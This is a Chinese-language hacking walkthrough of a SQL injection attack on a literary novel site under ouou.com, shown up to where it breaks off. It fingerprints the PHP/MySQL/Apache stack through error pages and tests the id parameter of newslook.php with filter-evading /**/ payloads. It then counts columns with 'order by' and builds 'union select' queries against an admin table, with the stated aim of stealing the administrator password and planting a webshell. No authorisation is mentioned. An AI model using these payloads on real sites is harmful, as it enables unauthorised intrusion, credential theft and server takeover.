縱橫時空文學(xué)站地址為http://xxx.ouou.com/，是ouou網(wǎng)站下屬的一個文學(xué)小說的網(wǎng)站。 界面做的非常漂亮. 初步看了下為PHP MYSQL的架構(gòu)PHP版本為PHP/5.1.4-0.1. 。WEBSERVER使用的是Apache/2.0.55 基于以上幾點應(yīng)該大概能判斷出服務(wù)器應(yīng)該是使用的UNIX . 這種架構(gòu)應(yīng)該為典型的P M U的架構(gòu)了 也就是PHP MYSQL UNIX 。 可能有讀者會問了 ？ 你怎么知道他的Apache跟MYSQL的版本呢？ 其實這個很簡單。 在WEB隨便輸入一個不存在的頁面 看下暴錯信息就OK了。 如圖1



看到圖1我們了解了網(wǎng)站的大概情況 首先就來查找注射漏洞。 隨便打開一個帶有參數(shù)的連接 地址為http://xzx.ouou.com/newslook.php?id=29 輸入一個單引號檢測， 成功返回錯誤信息， 并且暴出了WEB絕對路徑，如圖2



錯誤信息如下:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/webroot/zh/newslook.php on line 264

通過錯誤信息得知WEB路徑為/data/webroot/zh/newslook.php通過路徑可以肯定服務(wù)器為UNIX

繼續(xù)使用and 1=1 1=2來判斷是不是真的存在注射漏洞

http://xx.ouou.com/newslook.php?id=29【/**/and/**/1=1】/**/and/**/1=1 作用與我們在ASP注射中的 and 1=1的效果是一樣的，因為有些站會過濾■空格，/**/是替代空格的。返回正常

繼續(xù)http://xx.ouou.com/newslook.php?id=29【/**/and/**/1=2】

返回錯誤， 現(xiàn)在可以肯定http://xx.ouou.com/newslook.php?id=29 這個地址存在注射漏洞。

既然存在漏洞，我們就來通過注射點來查找到管理員的密碼從而登陸后臺來取得WEBSHELL。 現(xiàn)在來爆一下他的有多少個字段。

使用/**/order/**/by/**/10 來判斷他的字段是不是小于10

http://XX.ouou.com/newslook.php?id=29【/**/order/**/by/**/10】 如圖3



如圖得知我們執(zhí)行/**/order/**/by/**/10 頁面返回錯誤 說明字段是小于10的 我們繼續(xù)執(zhí)行

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/9】

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/8】

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/7】

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/6】

http://.ouou.com/newslook.php?id=29【/**/order/**/by/**/5】

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/4】

直到執(zhí)行/**/order/**/by/**/4的時候頁面返回正常 如圖4



我們看到當(dāng)執(zhí)行/**/order/**/by/**/4到4的時候返回正常說明存在4個字段。 因為我們在前面已經(jīng)得到MYSQL的版本 所以已經(jīng)不用判斷就知道是支持union聯(lián)合查詢的、

繼續(xù)猜解密碼

http://xx.ouou.com/newslook.php?id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4

返回出幾個數(shù)字，一會帳號密碼會從顯示出來 ：)

我們來爆字段名，經(jīng)過一段時間的猜解最終確定表為admin

http://xx.ouou.com/newslook.php?id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4/**/from/**/admin 如圖5

最新評論